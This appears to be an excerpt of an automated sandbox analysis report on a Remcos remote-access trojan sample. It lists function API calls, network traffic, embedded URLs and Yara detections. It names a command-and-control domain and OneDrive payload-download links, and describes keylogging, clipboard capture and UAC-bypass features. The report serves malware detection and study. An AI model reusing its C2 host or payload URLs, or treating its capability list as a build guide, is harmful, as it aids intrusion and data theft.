              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,10_1_0040BB30
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,10_1_0040BD37
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 12_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime,12_2_0040128D
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 12_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose,12_2_00401612
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,6_1_00407C97

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: kenoss.duckdns.org
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D7C8AC InternetCheckConnectionA,0_2_02D7C8AC
              Source: Joe Sandbox ViewIP Address: 13.107.137.11 13.107.137.11
              Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: GET /download?resid=9ADCDEDB531E38FE%21107&authkey=!AIYYWqDY10e5-pU HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET /download?resid=9ADCDEDB531E38FE%21107&authkey=!AIYYWqDY10e5-pU HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET /download?resid=9ADCDEDB531E38FE%21107&authkey=!AIYYWqDY10e5-pU HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,6_1_0041B380
              Source: global trafficHTTP traffic detected: GET /download?resid=9ADCDEDB531E38FE%21107&authkey=!AIYYWqDY10e5-pU HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET /download?resid=9ADCDEDB531E38FE%21107&authkey=!AIYYWqDY10e5-pU HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET /download?resid=9ADCDEDB531E38FE%21107&authkey=!AIYYWqDY10e5-pU HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: unknownDNS traffic detected: queries for: onedrive.live.com
              Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
              Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
              Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
              Source: nmfsxfjX.pifString found in binary or memory: http://geoplugin.net/json.gp
              Source: udVh4Ist4Z.exe, 00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2163236530.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000006.00000001.2139650597.0000000000490000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000AC0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
              Source: remcos.exe, remcos.exe, 0000000C.00000000.2337823304.0000000000416000.00000002.00000001.01000000.00000007.sdmp, remcos.exe, 0000000C.00000002.2338890937.0000000000416000.00000002.00000001.01000000.00000007.sdmp, remcos.exe, 0000000D.00000000.2418876564.0000000000416000.00000002.00000001.01000000.00000007.sdmp, remcos.exe, 0000000D.00000002.2442004580.0000000000416000.00000002.00000001.01000000.00000007.sdmp, nmfsxfjX.pif, 00000010.00000000.2558844631.0000000000416000.00000002.00000001.01000000.00000006.sdmp, remcos.exe, 00000011.00000002.2566375553.0000000000416000.00000002.00000001.01000000.00000009.sdmp, remcos.exe, 00000011.00000000.2565214757.0000000000416000.00000002.00000001.01000000.00000009.sdmp, remcos.exe, 00000012.00000002.2620397438.0000000000416000.00000002.00000001.01000000.00000009.sdmp, remcos.exe, 00000012.00000000.2619943576.0000000000416000.00000002.00000001.01000000.00000009.sdmp, remcos.exe.10.dr, remcos.exe.6.dr, nmfsxfjX.pif.0.drString found in binary or memory: http://www.pmail.com
              Source: udVh4Ist4Z.exe, 00000000.00000002.2140385254.000000000072A000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 00000008.00000003.2293558943.0000000000939000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 0000000F.00000003.2559378885.000000000076D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/
              Source: udVh4Ist4Z.exe, 00000000.00000002.2140385254.0000000000702000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 00000008.00000003.2293558943.00000000008D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/
              Source: Xjfxsfmn.PIF, 0000000F.00000003.2559378885.00000000006F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/S
              Source: Xjfxsfmn.PIF, 0000000F.00000002.2569407559.00000000141B2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=9ADCDEDB531E38FE%21107&authkey=
              Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: udVh4Ist4Z.exe, 00000000.00000002.2140385254.000000000072A000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 00000008.00000003.2293558943.0000000000939000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 0000000F.00000003.2559378885.000000000076D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xirfeg.sn.files.1drv.com/
              Source: Xjfxsfmn.PIF, 0000000F.00000003.2559378885.000000000076D000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 0000000F.00000003.2559378885.0000000000764000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xirfeg.sn.files.1drv.com/y4mA7VtsLBctMjPvNeW-nBjYzK-kMyIJaIZdFZhf0ai66qWNCa5Jqdc_iM5uVKa3zxn
              Source: Xjfxsfmn.PIF, 00000008.00000003.2293558943.0000000000939000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xirfeg.sn.files.1drv.com/y4mQLd7Jb4tXEApwTb1qUvLYu4AYaX9rqayqbrqvAn-5-ThXvkZfJF26xlkeR3Ny-gJ
              Source: Xjfxsfmn.PIF, 0000000F.00000002.2560602263.0000000000772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xirfeg.sn.files.1drv.com/y4mf57oWea_lC5UFEW7heHii22ItiVRqzOkuZoz6yyafu_P62cjXQyR0S8WE0jPq8Gh
              Source: udVh4Ist4Z.exe, 00000000.00000002.2140385254.000000000071C000.00000004.00000020.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2140385254.000000000072A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xirfeg.sn.files.1drv.com/y4mmJkpN2-URpDPce1turH6bNoPZHs8qohGTBPPgUSqUu1WeGjpTknCmr6n8UWtLOer
              Source: Xjfxsfmn.PIF, 0000000F.00000003.2559378885.000000000076D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xirfeg.sn.files.1drv.com:443/y4mA7VtsLBctMjPvNeW-nBjYzK-kMyIJaIZdFZhf0ai66qWNCa5Jqdc_iM5uVKa
              Source: Xjfxsfmn.PIF, 00000008.00000003.2293558943.0000000000939000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xirfeg.sn.files.1drv.com:443/y4mQLd7Jb4tXEApwTb1qUvLYu4AYaX9rqayqbrqvAn-5-ThXvkZfJF26xlkeR3N
              Source: udVh4Ist4Z.exe, 00000000.00000002.2140385254.000000000071C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xirfeg.sn.files.1drv.com:443/y4mmJkpN2-URpDPce1turH6bNoPZHs8qohGTBPPgUSqUu1WeGjpTknCmr6n8UWt
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.6:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.6:49725 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Contains functionality to register a low level keyboard hook
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,000000006_1_0040A2B8
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,6_1_0040B70E
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,6_1_004168C1
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,10_1_004168C1
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,6_1_0040B70E
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,6_1_0040A3E0
              Source: Yara matchFile source: Process Memory Space: udVh4Ist4Z.exe PID: 2056, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: nmfsxfjX.pif PID: 6400, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: nmfsxfjX.pif PID: 2420, type: MEMORYSTR

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 10.1.nmfsxfjX.pif.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.1.nmfsxfjX.pif.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.1.nmfsxfjX.pif.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.1.nmfsxfjX.pif.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.1.nmfsxfjX.pif.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.1.nmfsxfjX.pif.400000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000001.2293209618.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2163236530.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000001.2293209618.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000001.2139650597.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000001.2559054856.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000001.2559054856.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: udVh4Ist4Z.exe PID: 2056, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: nmfsxfjX.pif PID: 5000, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: nmfsxfjX.pif PID: 6400, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: nmfsxfjX.pif PID: 2420, type: MEMORYSTR

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Contains functionalty to change the wallpaper
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0041C9E2 SystemParametersInfoW,6_1_0041C9E2
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0041C9E2 SystemParametersInfoW,10_1_0041C9E2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 10.1.nmfsxfjX.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 10.1.nmfsxfjX.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 10.1.nmfsxfjX.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 16.1.nmfsxfjX.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 16.1.nmfsxfjX.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
